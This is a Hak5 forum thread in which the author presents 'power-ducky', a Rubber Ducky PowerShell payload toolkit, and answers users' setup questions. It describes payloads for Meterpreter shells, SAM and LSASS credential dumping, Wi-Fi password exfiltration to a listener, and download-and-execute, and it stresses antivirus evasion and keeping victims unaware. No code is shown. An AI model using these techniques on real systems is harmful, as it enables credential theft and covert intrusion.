b00stfr3ak Posted September 18, 2013 Share Posted September 18, 2013 (edited) This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability Power Shell Scripts for the Hak5 Ducky 1) Fast Meterpreter 2) Reverse Meterpreter 3) Dump Domain and Local Hashes 4) Dump Lsass Process 5) Dump Wifi Passwords 6) Wget Execute 99) Exit All payloads are written in powershell so nothing should be caught by AV https://github.com/b00stfr3ak/power-ducky Fast Meterpreter Stores the meterpreter script on a web sever, the ducky will then go grab the script using ssl and execute it on the victims machine. Reverse Meterpreter Creates a reverse meterpreter shell through powershell injection Dump Domain and Local Hashes Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server. Dump Lsass Process Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server. Dump Wifi Passwords Dumps all available wifi profiles, and then dumps each file through a tcp socket Wget Execute Downloads a file and executes it on the victim's machine Edited October 19, 2013 by b00stfr3ak Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted September 22, 2013 Author Share Posted September 22, 2013 Added the ability to dump clear text Wifi passwords from available profiles. Thanks to Crashie at https://forums.hak5.org/index.php?/topic/29002-payload-wi-fi-password-stealer-saving-to-sd/ Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted October 17, 2013 Author Share Posted October 17, 2013 The power-ducky toolkit has been updated to support SSL. Now you can transfer files from the victim to the attacker all encrypted. It does take a while with larger files however it does work, and happens in the background on the victim computer so they wont notice. Once the correct reg files are downloaded the script will print the hashes to the screen and write them to a file Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted October 19, 2013 Author Share Posted October 19, 2013 Fast Meterpreter has been added to the power-ducky toolkit. This payload stores a meterpreter script on a web server and then all the ducky has to do is download that script through ssl and then execute it. The beauty about this script is that it is 10 lines long and the actual powershell command is less then 200 characters. Ideas from: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/ https://forums.hak5.org/index.php?/topic/30398-payload-the-fastest-meterpreter-shell-youll-ever-get/ Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted November 14, 2013 Author Share Posted November 14, 2013 Has anyone tried this? Quote Link to comment Share on other sites More sharing options...
xrad Posted November 15, 2013 Share Posted November 15, 2013 Has anyone tried this? It looks good b00stfr3ak, please keep up the great work. I would try it but I'm away for a few days. When I get back and try it, I'll give some feedback as best I can. I'm a bit new to the Ducky, and very glad to see people still coming up with stuff for it. Quote Link to comment Share on other sites More sharing options...
mawlmiface Posted November 29, 2013 Share Posted November 29, 2013 Have you tried implementing Invoke-mimikatz, from powersploit. Quote Link to comment Share on other sites More sharing options...
mawlmiface Posted December 1, 2013 Share Posted December 1, 2013 (edited) Also how does the dump domain hashes work. I thought you could only dump domain hashes from NTDS.DIT file. Edited December 1, 2013 by mawlmiface Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted December 9, 2013 Author Share Posted December 9, 2013 Have you tried implementing Invoke-mimikatz, from powersploit. This could be implemented. I would just need to ask if I could use his script. Also how does the dump domain hashes work. I thought you could only dump domain hashes from NTDS.DIT file. If a computer is on the domain by default it keeps a number of cached credentials stored just in case the workstation can't talk to the domain controller. Quote Link to comment Share on other sites More sharing options...
factgasm Posted December 10, 2013 Share Posted December 10, 2013 Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno . Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful. I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?). I wasn't quite sure what to expect. Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things) which Darren covers in the one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art. You mention that its possible to "6) Wget Execute". Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However in looking at the documentation I'm not sure how to go about tailoring the source code in order that it downloads the particular file I want from the particular source website as it appears your source code is written in Ruby. Please help! [/thick] Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted December 13, 2013 Author Share Posted December 13, 2013 Hey b00stfr3ak, it's factgasm here, also known as Noobero Uno . Could you put together a video to demonstrate the use of Power Ducky Toolkit, please? That would be unbelievably useful. I dropped the inject.bin file on to my micro SD card then inserted that into a target machine via the Ducky and, hey presto, the script ran (hex encoded?). I wasn't quite sure what to expect. Once the script stopped running and the command shell closed, nothing obvious appeared to happen on the desktop. I assume the aim of the exploit was to allow a reverse shell to the attacking machine (among other things) which Darren covers in the one of the Hak5 videos. If that's the case I'm going to have to revisit that video until I have the procedure down to a fine art. You mention that its possible to "6) Wget Execute". Sounds excellent, that's exactly one of the things I want my Ducky to be able to do. However in looking at the documentation I'm not sure how to go about tailoring the source code in order that it downloads the particular file I want from the particular source website as it appears your source code is written in Ruby. Please help! [/thick] It would be a good idea to create some video's on this, I just haven't had time. Can you clone the newest repo, this should get rid of the hex option (it was broke and took to much time). The best option to try is fast meterpreter. It is the fastest command and an instant meterpreter shell in memory (so no AV to worry about). Wget Execute is OK but then you have to worry about dropping a binary file and not get caught by AV Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted December 31, 2013 Author Share Posted December 31, 2013 I tried to make the videos today but they didn't turn out right. If any one knows of a screen recording software for Linux that is low recourse, please list it. I have updated the repo and tested it on a new kali box and confirmed the scripts are working. Quote Link to comment Share on other sites More sharing options...
FlyinGrub Posted January 1, 2014 Share Posted January 1, 2014 http://www.omgubuntu.co.uk/2013/12/simple-screen-recorder-linux ? Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted January 1, 2014 Author Share Posted January 1, 2014 http://www.omgubuntu.co.uk/2013/12/simple-screen-recorder-linux ? Yeah that is the one I tried, but running two vm's and the screen recorder uses to much CPU for my laptop. It misses key presses from the ducky. Quote Link to comment Share on other sites More sharing options...
jojopyro Posted February 9, 2014 Share Posted February 9, 2014 possible to allow the script to set 'host ip' to a hostname as well? Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted May 3, 2014 Author Share Posted May 3, 2014 possible to allow the script to set 'host ip' to a hostname as well? Does the script fail with DNS names? It should just pass everything to metasploit. I'll take a look tonight. I plan on re-writting the tool, because the code looks so bad. Quote Link to comment Share on other sites More sharing options...
S3V3N Posted June 16, 2014 Share Posted June 16, 2014 Is it possible to have a sub menu option to set the Meterpreter IP's on the fly (as I use a Multi-hop VPN and my Metasploit IP can change), also add an option to drop a file to load a new Meterpreter into memory at boot up. Quote Link to comment Share on other sites More sharing options...
S3V3N Posted June 18, 2014 Share Posted June 18, 2014 b00stfr3ak, can you post some instructions on how to properly edit the files and what info is needed to get all of the options setup and running correctly?? Greatly Appreciated, Keep up the AWESOME Work!! Quote Link to comment Share on other sites More sharing options...
jm0202 Posted March 29, 2015 Share Posted March 29, 2015 Hello b00stfr3ak Powerducky is a great tool however the latest version checked in github has some issues... It seems there was some syntax issue in the main menu.. and the payload to add a user to the admin group fails, since the localadmin word is misspelled. For the reverse shell attack I am able to make it work from the rubber ducky, the payload is injected and i got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there.... I tried to use the meterpreter X64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for a x64 victim and your payload in github is specific for 32 bits.. do you have a reverse shell payload for x64? thank you.... Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted March 31, 2015 Author Share Posted March 31, 2015 Hello b00stfr3ak Powerducky is a great tool however the latest version checked in github has some issues... It seems there was some syntax issue in the main menu.. and the payload to add a user to the admin group fails, since the localadmin word is misspelled. For the reverse shell attack I am able to make it work from the rubber ducky, the payload is injected and i got a message in my attacking machine (sending stage to victim xx bytes) but it hangs there.... I tried to use the meterpreter X64 (since my victim machine uses an x64 architecture) but powershell just dies in the victim machine. It seems the payload needs to be specific for a x64 victim and your payload in github is specific for 32 bits.. do you have a reverse shell payload for x64? thank you.... Thanks, I fixed the add admin syntax and it has been pushed to github. What are the syntax issues with the main menu? x32 works on x64 OS. It might have been a network issue, because the powershell code did reach the metasploit server. I'm thinking about adding the option to not use a stager, but i'll have to do that later. For any issues can you post them to github so I can keep track of them. Thanks! Quote Link to comment Share on other sites More sharing options...
shamwow Posted July 7, 2015 Share Posted July 7, 2015 This script is menu driven and will create the txt and bin file for you. When needed it will also set up a listener. Let me know what you guys think! Also if any one wants to add to the script, it should be pretty easy all the files are separated for re-usability Power Shell Scripts for the Hak5 Ducky 1) Fast Meterpreter 2) Reverse Meterpreter 3) Dump Domain and Local Hashes 4) Dump Lsass Process 5) Dump Wifi Passwords 6) Wget Execute 99) Exit All payloads are written in powershell so nothing should be caught by AV https://github.com/b00stfr3ak/power-ducky Fast Meterpreter Stores the meterpreter script on a web sever, the ducky will then go grab the script using ssl and execute it on the victims machine. Reverse Meterpreter Creates a reverse meterpreter shell through powershell injection Dump Domain and Local Hashes Makes a copy of the sam and sys file, and then dumps those files through a tcp socket to a listening server. Dump Lsass Process Dumps the lsass process through powershell, then reads the file and dumps it through a tcp socket to a listening server. Dump Wifi Passwords Dumps all available wifi profiles, and then dumps each file through a tcp socket Wget Execute Downloads a file and executes it on the victim's machine how do i set this up to work in the ducky? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.